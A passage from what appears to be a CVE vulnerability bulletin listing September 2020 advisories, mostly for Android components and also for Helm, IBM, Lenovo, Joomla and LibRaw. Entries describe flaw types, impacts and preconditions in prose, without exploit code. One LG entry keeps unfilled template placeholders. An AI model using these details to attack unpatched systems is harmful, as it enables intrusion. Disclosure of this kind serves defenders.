    google -- android_11_devices In libavb, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-130231426 2020-09-17 not yet calculated CVE-2020-0369
    MISC
    google -- android_11_devices In GLESRenderEngine, there is a possible out of bounds read due to a buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-150303018 2020-09-17 not yet calculated CVE-2020-0359
    MISC
    google -- android_11_devices In netd, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-137346580 2020-09-18 not yet calculated CVE-2020-0365
    MISC
    google -- android_11_devices In libcodec2_soft_mp3dec, there is a possible information disclosure due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-144901522 2020-09-17 not yet calculated CVE-2020-0340
    MISC
    google -- android_11_devices In AccountManager, there is a possible bypass of a permissions check due to a confused deputy. This could lead to local information disclosure, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-123700107 2020-09-17 not yet calculated CVE-2020-0338
    MISC
    google -- android_11_devices In SurfaceFlinger, there is possible memory corruption due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-153467444 2020-09-17 not yet calculated CVE-2020-0336
    MISC
    google -- android_11_devices In MediaProvider, there is a possible permissions bypass due to SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-140729887 2020-09-17 not yet calculated CVE-2020-0344
    MISC
    google -- android_11_devices In NFC, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges and a Firmware compromise needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-122361504 2020-09-18 not yet calculated CVE-2020-0335
    MISC
    google -- android_11_devices In NFC, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges and a Firmware compromise needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-147995915 2020-09-18 not yet calculated CVE-2020-0334
    MISC
    google -- android_11_devices In NetworkStatsService, there is a possible access to protected data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-119672472 2020-09-17 not yet calculated CVE-2020-0343
    MISC
    google -- android_11_devices In libstagefright, there is a possible dead loop due to an uncaught exception. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-124783982 2020-09-17 not yet calculated CVE-2020-0332
    MISC
    google -- android_11_devices In the camera, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-150156131 2020-09-17 not yet calculated CVE-2020-0328
    MISC
    google -- android_11_devices In libsonivox, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-136660304 2020-09-17 not yet calculated CVE-2020-0324
    MISC
    google -- android_11_devices In libavb, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-146516087 2020-09-17 not yet calculated CVE-2020-0323
    MISC
    google -- android_11_devices In apexd, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-147002540 2020-09-17 not yet calculated CVE-2020-0322
    MISC
    google -- android_11_devices In the mp3 extractor, there is a possible out of bounds write due to uninitialized data. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-155171907 2020-09-17 not yet calculated CVE-2020-0321
    MISC
    google -- android_11_devices In libstagefright, there is a possible resource exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-129282427 2020-09-17 not yet calculated CVE-2020-0320
    MISC
    google -- android_11_devices In the OMX encoder, there is a possible out of bounds read due to invalid input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-63522940 2020-09-17 not yet calculated CVE-2020-0329
    MISC
    google -- android_11_devices In PackageInstaller, there is a possible permissions bypass due to a tapjacking vulnerability. This could lead to local escalation of privilege using an app set as the default Assist app with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-138443815 2020-09-17 not yet calculated CVE-2020-0366
    MISC
    google -- android_11_devices In devicepolicy service, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-155183624 2020-09-17 not yet calculated CVE-2020-0297
    MISC
    google -- android_11_devices In Battery Saver, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-153879099 2020-09-17 not yet calculated CVE-2020-0312
    MISC
    google -- android_11_devices In ADB server and USB server, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-153356209 2020-09-17 not yet calculated CVE-2020-0296
    MISC
    google -- android_11_devices In libmkvextractor, there is a possible resource exhaustion due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-141860394 2020-09-17 not yet calculated CVE-2020-0287
    MISC
    google -- android_11_devices In screencap, there is a possible command injection due to improper input validation. This could lead to local escalation of privilege in a system process with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-123230379 2020-09-17 not yet calculated CVE-2020-0130
    MISC
    google -- android_11_devices In the Bluetooth server, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System privileges and a Firmware compromise needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-147227320 2020-09-18 not yet calculated CVE-2020-0309
    MISC
    google -- android_11_devices In the audio server, there is a missing permission check. This could lead to local escalation of privilege regarding audio settings with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-137015603 2020-09-18 not yet calculated CVE-2020-0089
    MISC
    google -- android_11_devices In the Media extractor, there is a possible use after free due to improper locking. This could lead to remote code execution in the media extractor with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-148223229 2020-09-17 not yet calculated CVE-2020-0303
    MISC
    google -- android_11_devices In UsageStatsManager, there is a possible access to protected data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-119671929 2020-09-17 not yet calculated CVE-2020-0317
    MISC
    google -- android_11_devices In mediadrm, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-137282168 2020-09-17 not yet calculated CVE-2020-0125
    MISC
    google -- android_11_devices In the Settings app, there is an insecure default value. This could lead to local escalation of privilege and tapjacking with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-144507081 2020-09-18 not yet calculated CVE-2020-0271
    MISC
    google -- android_11_devices In WiFi tethering, there is a possible attacker controlled intent due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-156353008 2020-09-18 not yet calculated CVE-2020-0262
    MISC
    google -- android_11_devices In Java network APIs, there is possible access to sensitive network state due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-141455849 2020-09-17 not yet calculated CVE-2020-0293
    MISC
    google -- android_11_devices In MediaProvider, there is a possible way to access ContentResolver and MediaStore entries the app shouldn't have access to due to a permissions bypass. This could lead to local escalation of privilege, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-150507736 2020-09-17 not yet calculated CVE-2020-0275
    MISC
    google -- android_11_devices In NetworkPolicyManagerService, there is a possible permissions bypass due to a missing permission check. This could lead to local escalation of privilege allowing a malicious app to modify the device's data plan with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-148627993 2020-09-17 not yet calculated CVE-2020-0277
    MISC
    google -- android_11_devices In tremolo, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-145790628 2020-09-17 not yet calculated CVE-2020-0270
    MISC
    google -- android_11_devices In the AAC parser, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-131430997 2020-09-17 not yet calculated CVE-2020-0279
    MISC
    google -- android_11_devices In NFC, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure. System execution privileges, a Firmware compromise, and User interaction are needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-137857778 2020-09-18 not yet calculated CVE-2020-0281
    MISC
    google -- android_11_devices In NFC, there is a possible use-after-free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-148294643 2020-09-18 not yet calculated CVE-2020-0268
    MISC
    google -- android_11_devices In PackageManager, there is a missing permission check. This could lead to local information disclosure across user boundaries with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-153995991 2020-09-17 not yet calculated CVE-2020-0288
    MISC
    google -- android_11_devices In libstagefright, there is a possible resource exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-124940460 2020-09-17 not yet calculated CVE-2020-0301
    MISC
    google -- android_11_devices
     
    In PackageManager, there is a missing permission check. This could lead to local information disclosure across users with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Android ID: A-153996872 2020-09-17 not yet calculated CVE-2020-0289
    MISC
    google -- android_11_devices
     
    In PackageManager, there is a missing permission check. This could lead to local information disclosure across users with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Android ID: A-153996866 2020-09-17 not yet calculated CVE-2020-0290
    MISC
    google -- android_devices
     
    There is a possible out of bounds write due to an incorrect bounds check. Product: Android; Versions: Android SoC; Android ID: A-160812576 2020-09-17 not yet calculated CVE-2020-0342
    MISC
    google -- android_devices
     
    UNIQLO App for Android versions 7.3.3 and earlier allows remote attackers to lead a user to access an arbitrary website via a malicious App created by the third party. As a result, if the access destination is a malicious website, the user may fall victim to the social engineering attack. 2020-09-18 not yet calculated CVE-2020-5629
    MISC
    google -- android_devices
     
    In manifest files of the SmartSpace package, there is a possible tapjacking vector due to a missing permission check. This could lead to local escalation of privilege and account hijacking with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-156046804 2020-09-17 not yet calculated CVE-2020-0387
    MISC
    google -- android_devices
     
    In Pixel's use of the Catpipe library, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-150730508 2020-09-17 not yet calculated CVE-2020-0434
    MISC
    google -- android_devices
     
    In various functions in fscrypt_ice.c and related files in some implementations of f2fs encryption that use encryption hardware which only supports 32-bit IVs (Initialization Vectors), 64-bit IVs are used and later are truncated to 32 bits. This may cause IV reuse and thus weakened disk encryption. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-153450752; References: N/A 2020-09-17 not yet calculated CVE-2020-0407
    MISC
    google -- android_devices
     
    In create_pinctrl of core.c, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-140550171 2020-09-17 not yet calculated CVE-2020-0427
    MISC
    google -- android_devices
     
    In Parse_wave of eas_mdls.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote information disclosure in a highly constrained process with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11; Android ID: A-150159669 2020-09-17 not yet calculated CVE-2020-0381
    MISC
    google -- android_devices
     
    In kbd_keycode of keyboard.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-144161459 2020-09-17 not yet calculated CVE-2020-0431
    MISC
    google -- android_devices
     
    In uvc_scan_chain_forward of uvc_driver.c, there is a possible linked list corruption due to an unusual root cause. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-111893654; References: Upstream kernel 2020-09-17 not yet calculated CVE-2020-0404
    MISC
    google -- android_devices
     
    In the FPC TrustZone fingerprint App, there is a possible invalid command handler due to an exposed test feature. This could lead to local escalation of privilege in the TEE, with System execution privileges required. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-131252923 2020-09-17 not yet calculated CVE-2020-0403
    MISC
    google -- android_devices
     
    In skb_to_mamac of networking.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-143560807 2020-09-17 not yet calculated CVE-2020-0432
    MISC
    google -- android_devices
     
    There is a possible out of bounds write due to an incorrect bounds check. Product: Android; Versions: Android SoC; Android ID: A-160812574 2020-09-17 not yet calculated CVE-2020-0278
    MISC
    google -- android_devices
     
    In blk_mq_queue_tag_busy_iter of blk-mq-tag.c, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-151939299 2020-09-17 not yet calculated CVE-2020-0433
    MISC
    google -- android_devices
     
    In CamX code, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges required. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-123999783 2020-09-17 not yet calculated CVE-2020-0428
    MISC
    google -- android_devices
     
    In inline_data_addr of f2fs.h, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-133762747 2020-09-17 not yet calculated CVE-2020-0435
    MISC
    google -- android_devices
     
    In skb_headlen of /include/linux/skbuff.h, there is a possible out of bounds read due to memory corruption. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-153881554 2020-09-17 not yet calculated CVE-2020-0430
    MISC
    google -- android_devices
     
    There is a possible out of bounds write due to an incorrect bounds check. Product: Android; Versions: Android SoC; Android ID: A-149871374 2020-09-17 not yet calculated CVE-2020-0123
    MISC
    google -- android_devices
     
    UNIQLO App for Android versions 7.3.3 and earlier allows remote attackers to lead a user to access an arbitrary website via the vulnerable App. As a result, if the access destination is a malicious website, the user may fall victim to the social engineering attack. 2020-09-18 not yet calculated CVE-2020-5628
    MISC
    google -- android_devices
     
    There is a possible out of bounds write due to an incorrect bounds check. Product: Android; Versions: Android SoC; Android ID: A-156333725 2020-09-17 not yet calculated CVE-2020-0229
    MISC
    google -- android_devices
     
    In l2tp_session_delete and related functions of l2tp_core.c, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android kernel; Android ID: A-152735806 2020-09-17 not yet calculated CVE-2020-0429
    MISC
    google -- brotli
     
    A buffer overflow exists in the Brotli library versions prior to 1.0.8 where an attacker controlling the input length of a "one-shot" decompression request to a script can trigger a crash, which happens when copying over chunks of data larger than 2 GiB. It is recommended to update your Brotli library to 1.0.8 or later. If one cannot update, we recommend to use the "streaming" API as opposed to the "one-shot" API, and impose chunk size limits. 2020-09-15 not yet calculated CVE-2020-8927
    CONFIRM
    google -- multiple_android_devices
     
    In showNotification of EmergencyCallbackModeService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11; Android ID: A-154124307 2020-09-17 not yet calculated CVE-2020-0395
    MISC
    google -- multiple_android_devices
     
    In DecodeFrameCombinedMode of combined_decode.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10; Android ID: A-152496149 2020-09-17 not yet calculated CVE-2020-0245
    MISC
    google -- multiple_android_devices
     
    In showLimitedSimFunctionWarningNotification of NotificationMgr.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11; Android ID: A-153993591 2020-09-17 not yet calculated CVE-2020-0399
    MISC
    google -- multiple_android_devices
     
    In setInstallerPackageName of PackageManagerService.java, there is a missing permission check. This could lead to local escalation of privilege and granting spurious permissions with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11; Android ID: A-150857253 2020-09-17 not yet calculated CVE-2020-0401
    MISC
    google -- multiple_android_devices
     
    In the Bluetooth service, there is a possible spoofing attack due to a logic error. This could lead to remote information disclosure of sensitive information with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11; Android ID: A-150156492 2020-09-17 not yet calculated CVE-2020-0379
    MISC
    google -- multiple_android_devices
     
    In Parse_art of eas_mdls.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote information disclosure in the media extractor with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0; Android ID: A-150159906 2020-09-17 not yet calculated CVE-2020-0384
    MISC
    google -- multiple_android_devices
     
    In Parse_ins of eas_mdls.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote information disclosure in the media extractor process with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0; Android ID: A-150160279 2020-09-17 not yet calculated CVE-2020-0383
    MISC
    google -- multiple_android_devices
     
    In Parse_insh of eas_mdls.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote information disclosure in the media extractor with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1; Android ID: A-150160041 2020-09-17 not yet calculated CVE-2020-0385
    MISC
    google -- multiple_android_devices
     
    In onCreate of RequestPermissionActivity.java, there is a possible tapjacking vector due to an insecure default value. This could lead to local escalation of privilege allowing an attacker to set Bluetooth discoverability with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11; Android ID: A-155650356 2020-09-17 not yet calculated CVE-2020-0386
    MISC
    google -- multiple_android_devices
     
    In applyPolicy of PackageManagerService.java, there is possible arbitrary command execution as System due to an unenforced protected-broadcast. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9 Android-10 Android-11; Android ID: A-158570769 2020-09-17 not yet calculated CVE-2020-0391
    MISC
    google -- multiple_android_devices
     
    In decrypt and decrypt_1_2 of CryptoPlugin.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9 Android-10 Android-11; Android ID: A-154123412 2020-09-17 not yet calculated CVE-2020-0393
    MISC
    google -- multiple_android_devices
     
    In verifyIntentFiltersIfNeeded of PackageManagerService.java, there is a possible settings bypass allowing an app to become the default handler for arbitrary domains. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10; Android ID: A-146204120 2020-09-17 not yet calculated CVE-2020-0074
    MISC
    google -- multiple_android_devices
     
    In allocExcessBits of bitalloc.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10; Android ID: A-146398979 2020-09-17 not yet calculated CVE-2020-0380
    MISC
    google -- multiple_android_devices
     
    In onCreate of BluetoothPairingDialog.java, there is a possible tapjacking vector due to an insecure default value. This could lead to local escalation of privilege and untrusted devices accessing contact lists with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11; Android ID: A-155648639 2020-09-17 not yet calculated CVE-2020-0394
    MISC
    google -- multiple_android_devices
     
    In various places in Telephony, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0; Android ID: A-155094269 2020-09-17 not yet calculated CVE-2020-0396
    MISC
    google -- multiple_android_devices
     
    In getNotificationBuilder of CarrierServiceStateTracker.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0; Android ID: A-155092443 2020-09-17 not yet calculated CVE-2020-0397
    MISC
    google -- multiple_android_devices
     
    In getLayerDebugInfo of SurfaceFlinger.cpp, there is a possible code execution due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9 Android-10 Android-11; Android ID: A-150226608 2020-09-17 not yet calculated CVE-2020-0392
    MISC
    helm -- helm
     
    In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL connection). This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the index file in the Helm repository cache before installing software. 2020-09-17 not yet calculated CVE-2020-15185
    MISC
    CONFIRM
    helm -- helm
     
    In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the `alias` field on a `Chart.yaml` is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the `dependencies` field of any untrusted chart, verifying that the `alias` field is either not used, or (if used) does not contain newlines or path characters. 2020-09-17 not yet calculated CVE-2020-15184
    MISC
    CONFIRM
    helm -- helm
     
    In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to `helm --help`. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the `name` field in the `plugin.yaml` file for a plugin, looking for characters outside of the [a-zA-Z0-9._-] range. 2020-09-17 not yet calculated CVE-2020-15186
    MISC
    CONFIRM
    helm -- helm
     
    In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded (which can occur during a MITM attack on a non-SSL connection). This issue has been patched in Helm 2.16.11 and Helm 3.3.2. As a possible workaround make sure to install plugins using a secure connection protocol like SSL. 2020-09-17 not yet calculated CVE-2020-15187
    MISC
    CONFIRM
    hewlett_packard -- enterprise_universal_api_framework
     
    A potential security vulnerability has been identified in Hewlett Packard Enterprise Universal API Framework. The vulnerability could be remotely exploited to allow SQL injection in HPE Universal API Framework for VMware Esxi v2.5.2 and HPE Universal API Framework for Microsoft Hyper-V (VHD). 2020-09-18 not yet calculated CVE-2020-24623
    MISC
    huawei -- taurus-anoob_devices
     
    Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a use-after-free (UAF) vulnerability. An authenticated, local attacker may perform specific operations to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege and compromise the service. 2020-09-18 not yet calculated CVE-2020-9084
    MISC
    ibm -- bladecenter_advanced_management_module
     
    A cross-site scripting inclusion (XSSI) vulnerability was reported in the legacy IBM BladeCenter Advanced Management Module (AMM) web interface prior to version 3.68n [BPET68N]. This vulnerability could allow an authenticated user's AMM credentials to be disclosed if the user is convinced to visit a malicious web site, possibly through phishing. Successful exploitation requires specific knowledge about the user's network to be included in the malicious web site. Impact is limited to the normal access restrictions of the user visiting the malicious web site, and subject to the user being logged into AMM, being able to connect to both AMM and the malicious web site while the web browser is open, and using a web browser that does not inherently protect against this class of attack. The JavaScript code is not executed on AMM itself. 2020-09-15 not yet calculated CVE-2020-8339
    MISC
    ibm -- maximo_asset_management
     
    IBM Maximo Asset Management 7.6.0 and 7.6.1 could allow a remote attacker to conduct phishing attacks, using a tabnabbing attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 179537. 2020-09-16 not yet calculated CVE-2020-4409
    XF
    CONFIRM
    ibm -- security_trusteer_pinpoint_detect
     
    IBM Security Trusteer Pinpoint Detect 11.6.5 could disclose some information due to using a wildcard in the Access-Control-Allow-Origin header. IBM X-Force ID: 187371. 2020-09-16 not yet calculated CVE-2020-4708
    XF
    CONFIRM
    installbuilder -- installbuilder
     
    InstallBuilder for Qt Windows (versions prior to 20.7.0) installers look for plugins at a predictable location at initialization time, writable by non-admin users. While those plugins are not required, they are loaded if present, which could allow an attacker to plant a malicious library which could result in code execution with the security scope of the installer. 2020-09-18 not yet calculated CVE-2020-3979
    MISC
    intel -- multiple_products
     
    Logic error in BIOS firmware for 8th, 9th and 10th Generation Intel(R) Core(TM) Processors may allow an unauthenticated user to potentially enable escalation of privilege, denial of service and/or information disclosure via physical access. 2020-09-14 not yet calculated CVE-2020-24457
    MISC
    jenkins -- jenkins
     
    A cross-site request forgery (CSRF) vulnerability in Jenkins MongoDB Plugin 1.3 and earlier allows attackers to gain access to some metadata of any arbitrary files on the Jenkins controller. 2020-09-16 not yet calculated CVE-2020-2268
    MLIST
    CONFIRM
    joomla -- joomla!
     
    The paGO Commerce plugin 2.5.9.0 for Joomla! allows SQL Injection via the administrator/index.php?option=com_pago&view=comments filter_published parameter. 2020-09-18 not yet calculated CVE-2020-25751
    MISC
    MISC
    json-bigint -- json-bigint
     
    Prototype pollution in json-bigint npm package < 1.0.0 may lead to a denial-of-service (DoS) attack. 2020-09-18 not yet calculated CVE-2020-8237
    MISC
    lenovo --
     
    A race condition vulnerability was reported in Lenovo System Update prior to version 5.07.0106 that could allow escalation of privilege. 2020-09-15 not yet calculated CVE-2020-8342
    MISC
    lenovo -- system_x_imm2
     
    A cross-site scripting (XSS) vulnerability was discovered in the legacy IBM and Lenovo System x IMM2 (Integrated Management Module 2), prior to version 5.60, embedded Baseboard Management Controller (BMC) web interface during an internal security review. This vulnerability could allow JavaScript code to be executed in the user's web browser if the user is convinced to visit a crafted URL, possibly through phishing. Successful exploitation requires specific knowledge about the user's network to be included in the crafted URL. Impact is limited to the normal access restrictions and permissions of the user clicking the crafted URL, and subject to the user being able to connect to and already being authenticated to IMM2 or other systems. The JavaScript code is not executed on IMM2 itself. 2020-09-15 not yet calculated CVE-2020-8340
    MISC
    lenovo -- vantage
     
    A denial of service vulnerability was reported in the Lenovo Vantage component called Lenovo System Interface Foundation prior to version 1.1.19.5 that could allow configuration files to be written to non-standard locations. 2020-09-15 not yet calculated CVE-2020-8346
    MISC
    lg -- multiple_products
     
    A vulnerability that can hijack a DLL file that is loaded during products(LGPCSuite_Setup, IPSFULLHD, LG_ULTRAWIDE, ULTRA_HD_Driver Setup) installation into a DLL file that the hacker wants. Missing Support for Integrity Check vulnerability in ____COMPONENT____ of LG Electronics (LGPCSuite_Setup), (IPSFULLHD, LG_ULTRAWIDE, ULTRA_HD_Driver Setup) allows ____ATTACKER/ATTACK____ to cause ____IMPACT____. This issue affects: LG Electronics; LGPCSuite_Setup : 1.0.0.3 on Windows(x86, x64); IPSFULLHD, LG_ULTRAWIDE, ULTRA_HD_Driver Setup : 1.0.0.9 on Windows(x86, x64). 2020-09-14 not yet calculated CVE-2020-7807
    MISC
    MISC
    libraw -- libraw
     
    libraw 20.0 has a null pointer dereference vulnerability in parse_tiff_ifd in src/metadata/tiff.cpp, which may result in context-dependent arbitrary code execution. 2020-09-16 not yet calculated CVE-2020-24890
    MISC
    libraw -- libraw
     
    A buffer overflow vulnerability in LibRaw version < 20.0 LibRaw::GetNormalizedModel in src/metadata/normalize_model.cpp may lead to context-dependent arbitrary code execution. 2020-09-16 not yet calculated CVE-2020-24889
    MISC
    linux -- linux_kernel
     
